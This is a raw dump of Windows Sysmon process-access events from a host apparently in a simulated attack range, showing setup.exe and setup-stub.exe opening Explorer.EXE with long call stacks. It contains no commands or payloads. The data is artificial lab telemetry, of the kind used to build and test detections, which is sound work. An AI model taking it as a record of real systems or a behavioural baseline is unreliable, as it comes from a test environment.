13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 